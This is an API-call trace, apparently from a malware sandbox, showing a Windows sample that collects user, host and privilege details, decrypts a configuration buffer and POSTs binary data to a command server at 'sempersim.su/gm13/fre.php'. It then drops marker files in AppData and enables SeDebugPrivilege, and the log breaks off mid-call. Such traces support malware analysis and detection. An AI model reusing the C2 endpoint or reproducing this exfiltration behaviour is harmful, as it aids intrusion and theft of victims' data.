[0065.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7) returned 0x63b550 [0065.380] GetProcessHeap () returned 0x620000 [0065.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1a5) returned 0x63a6e0 [0065.380] GetProcessHeap () returned 0x620000 [0065.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0000) returned 0x575020 [0065.404] GetProcessHeap () returned 0x620000 [0065.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x575020 | out: hHeap=0x620000) returned 1 [0065.412] GetProcessHeap () returned 0x620000 [0065.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63cbb8 [0065.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.413] GetUserNameW (in: lpBuffer=0x63cbb8, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0065.416] GetProcessHeap () returned 0x620000 [0065.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.416] GetProcessHeap () returned 0x620000 [0065.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63cbb8 [0065.417] GetComputerNameW (in: lpBuffer=0x63cbb8, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0065.417] GetProcessHeap () returned 0x620000 [0065.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.418] GetCurrentThread () returned 0xfffffffe [0065.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.419] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0065.419] GetLastError () returned 0x3f0 [0065.420] GetCurrentProcess () returned 0xffffffff [0065.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.421] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x210) returned 1 [0065.421] GetProcessHeap () returned 0x620000 [0065.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63cbb8 [0065.421] GetProcessHeap () returned 0x620000 [0065.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d298 [0065.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.422] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0065.422] GetProcessHeap () returned 0x620000 [0065.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0065.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.424] GetTokenInformation (in: TokenHandle=0x210, TokenInformationClass=0x1, TokenInformation=0x6390f8, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6390f8, ReturnLength=0x19fb70) returned 1 [0065.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.425] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x639100*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x63cbb8, cchName=0x19fb60, ReferencedDomainName=0x63d298, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0065.430] GetProcessHeap () returned 0x620000 [0065.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f44) returned 0x63e9b8 [0065.431] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.431] wvsprintfW (in: param_1=0x63e9b8, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0065.431] GetProcessHeap () returned 0x620000 [0065.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x62b758 [0065.431] GetProcessHeap () returned 0x620000 [0065.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63e9b8 | out: hHeap=0x620000) returned 1 [0065.432] GetProcessHeap () returned 0x620000 [0065.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0065.432] CloseHandle (hObject=0x210) returned 1 [0065.432] GetProcessHeap () returned 0x620000 [0065.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d298 | out: hHeap=0x620000) returned 1 [0065.433] GetProcessHeap () returned 0x620000 [0065.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cbb8 | out: hHeap=0x620000) returned 1 [0065.433] GetProcessHeap () returned 0x620000 [0065.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b758 | out: hHeap=0x620000) returned 1 [0065.434] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.434] GetDesktopWindow () returned 0x10010 [0065.435] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.435] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0065.436] GetProcessHeap () returned 0x620000 [0065.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x63b5c0 [0065.436] GetProcessHeap () returned 0x620000 [0065.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5c0 | out: hHeap=0x620000) returned 1 [0065.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.437] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0065.438] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76dd0000 [0065.483] GetProcAddress (hModule=0x76dd0000, lpProcName="NetUserGetInfo") returned 0x701933a0 [0065.498] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x634660*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x118c89b, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0065.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.523] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x62b4a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0065.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.524] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x62b4a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0065.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.525] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0065.525] GetProcessHeap () returned 0x620000 [0065.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6346a8 [0065.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.526] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 0 [0065.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.566] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x63a478) returned 1 [0065.612] GetProcessHeap () returned 0x620000 [0065.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0065.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.613] CryptImportKey (in: hProv=0x63a478, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x62d150) returned 1 [0065.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.615] CryptSetKeyParam (hKey=0x62d150, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0065.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.616] CryptSetKeyParam (hKey=0x62d150, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0065.616] GetProcessHeap () returned 0x620000 [0065.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0065.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.617] CryptDecrypt (in: hKey=0x62d150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6346a8, pdwDataLen=0x19f974 | out: pbData=0x6346a8, pdwDataLen=0x19f974) returned 1 [0065.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.635] CryptDestroyKey (hKey=0x62d150) returned 1 [0065.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0065.636] CryptReleaseContext (hProv=0x63a478, dwFlags=0x0) returned 1 [0065.636] GetProcessHeap () returned 0x620000 [0065.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x63d420 [0065.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.637] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0065.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.638] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0065.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0065.639] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0065.639] GetProcessHeap () returned 0x620000 [0065.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633340 [0065.639] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x633200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0065.742] GetProcessHeap () returned 0x620000 [0065.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b510 [0065.742] socket (af=2, type=1, protocol=6) returned 0x264 [0065.744] connect (s=0x264, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0065.800] FreeAddrInfoW (pAddrInfo=0x633200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0065.800] GetProcessHeap () returned 0x620000 [0065.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63cc48 [0065.800] GetProcessHeap () returned 0x620000 [0065.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x643d58 [0065.801] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.802] wvsprintfA (in: param_1=0x643d58, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0065.802] GetProcessHeap () returned 0x620000 [0065.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x6428b0 [0065.802] GetProcessHeap () returned 0x620000 [0065.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0065.803] GetProcessHeap () returned 0x620000 [0065.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643518 [0065.803] GetProcessHeap () returned 0x620000 [0065.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x643d58 [0065.804] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0065.805] wvsprintfA (in: param_1=0x643d58, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 237 [0065.805] GetProcessHeap () returned 0x620000 [0065.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x645d40 [0065.805] GetProcessHeap () returned 0x620000 [0065.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0065.806] send (s=0x264, buf=0x645d40*, len=237, flags=0) returned 237 [0065.806] send (s=0x264, buf=0x63b6b0*, len=288, flags=0) returned 288 [0065.806] GetProcessHeap () returned 0x620000 [0065.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x643d58 [0065.806] recv (in: s=0x264, buf=0x643d58, len=4048, flags=0 | out: buf=0x643d58*) returned 229 [0067.310] GetProcessHeap () returned 0x620000 [0067.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645d40 | out: hHeap=0x620000) returned 1 [0067.310] GetProcessHeap () returned 0x620000 [0067.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643518 | out: hHeap=0x620000) returned 1 [0067.311] GetProcessHeap () returned 0x620000 [0067.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6428b0 | out: hHeap=0x620000) returned 1 [0067.311] GetProcessHeap () returned 0x620000 [0067.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0067.311] closesocket (s=0x264) returned 0 [0067.312] GetProcessHeap () returned 0x620000 [0067.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b510 | out: hHeap=0x620000) returned 1 [0067.312] GetProcessHeap () returned 0x620000 [0067.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.313] GetProcessHeap () returned 0x620000 [0067.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6346a8 | out: hHeap=0x620000) returned 1 [0067.313] GetProcessHeap () returned 0x620000 [0067.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633340 | out: hHeap=0x620000) returned 1 [0067.318] GetProcessHeap () returned 0x620000 [0067.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.323] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0067.324] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63d420 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0067.324] GetProcessHeap () returned 0x620000 [0067.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x644d30 [0067.326] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.326] wvsprintfW (in: param_1=0x644d30, param_2="%s\\%s", arglist=0x19f988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0067.326] GetProcessHeap () returned 0x620000 [0067.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x63d910 [0067.326] GetProcessHeap () returned 0x620000 [0067.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d30 | out: hHeap=0x620000) returned 1 [0067.327] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0067.328] GetProcessHeap () returned 0x620000 [0067.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f50) returned 0x644d30 [0067.328] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.329] wvsprintfW (in: param_1=0x644d30, param_2="%s\\%s.%s", arglist=0x19f99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0067.329] GetProcessHeap () returned 0x620000 [0067.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6373a0 [0067.329] GetProcessHeap () returned 0x620000 [0067.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d30 | out: hHeap=0x620000) returned 1 [0067.330] GetProcessHeap () returned 0x620000 [0067.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d910 | out: hHeap=0x620000) returned 1 [0067.330] GetProcessHeap () returned 0x620000 [0067.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.333] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb34, dwLength=0x1c | out: lpBuffer=0x19fb34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.334] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x19fb14, dwLength=0x1c | out: lpBuffer=0x19fb14*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.334] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x4f0000 [0067.336] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.337] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0067.337] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0067.339] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.340] WriteFile (in: hFile=0x264, lpBuffer=0x4f0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19fb3c, lpOverlapped=0x0 | out: lpBuffer=0x4f0000*, lpNumberOfBytesWritten=0x19fb3c*=0x4, lpOverlapped=0x0) returned 1 [0067.341] CloseHandle (hObject=0x264) returned 1 [0067.343] GetProcessHeap () returned 0x620000 [0067.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6373a0 | out: hHeap=0x620000) returned 1 [0067.343] GetProcessHeap () returned 0x620000 [0067.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.344] GetProcessHeap () returned 0x620000 [0067.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0067.344] GetProcessHeap () returned 0x620000 [0067.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b740 | out: hHeap=0x620000) returned 1 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b550 | out: hHeap=0x620000) returned 1 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635178 | out: hHeap=0x620000) returned 1 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b800 | out: hHeap=0x620000) returned 1 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1388) returned 0x635178 [0067.345] GetProcessHeap () returned 0x620000 [0067.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x63ea00 [0067.425] GetProcessHeap () returned 0x620000 [0067.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.426] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0067.427] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63d420 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0067.427] GetProcessHeap () returned 0x620000 [0067.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x643d58 [0067.428] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.428] wvsprintfW (in: param_1=0x643d58, param_2="%s\\%s", arglist=0x19f9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0067.428] GetProcessHeap () returned 0x620000 [0067.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x63d910 [0067.428] GetProcessHeap () returned 0x620000 [0067.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.430] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0067.430] GetProcessHeap () returned 0x620000 [0067.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f50) returned 0x643d58 [0067.431] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.431] wvsprintfW (in: param_1=0x643d58, param_2="%s\\%s.%s", arglist=0x19f9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0067.432] GetProcessHeap () returned 0x620000 [0067.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x637b20 [0067.432] GetProcessHeap () returned 0x620000 [0067.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643d58 | out: hHeap=0x620000) returned 1 [0067.432] GetProcessHeap () returned 0x620000 [0067.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d910 | out: hHeap=0x620000) returned 1 [0067.432] GetProcessHeap () returned 0x620000 [0067.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.434] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0067.434] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0067.435] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.437] WriteFile (in: hFile=0x264, lpBuffer=0x19fbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19fb80, lpOverlapped=0x0 | out: lpBuffer=0x19fbbc*, lpNumberOfBytesWritten=0x19fb80*=0x1, lpOverlapped=0x0) returned 1 [0067.438] CloseHandle (hObject=0x264) returned 1 [0067.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.445] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fba4 | out: pSid=0x19fba4*=0x63ec58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0067.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.446] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x63ec58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fba8 | out: IsMember=0x19fba8) returned 1 [0067.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.448] GetCurrentProcess () returned 0xffffffff [0067.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.449] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19fba4 | out: TokenHandle=0x19fba4*=0x254) returned 1 [0067.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.450] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19fb9c | out: lpLuid=0x19fb9c*(LowPart=0x14, HighPart=0)) returned 1 [0067.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.454] AdjustTokenPrivileges (in: TokenHandle=0x254, DisableAllPrivileges=0, NewState=0x19fb8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0067.454] CloseHandle (hObject=0x254) returned 1 [0067.454] GetProcessHeap () returned 0x620000 [0067.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0067.455] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0067.455] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x63d420 | out: 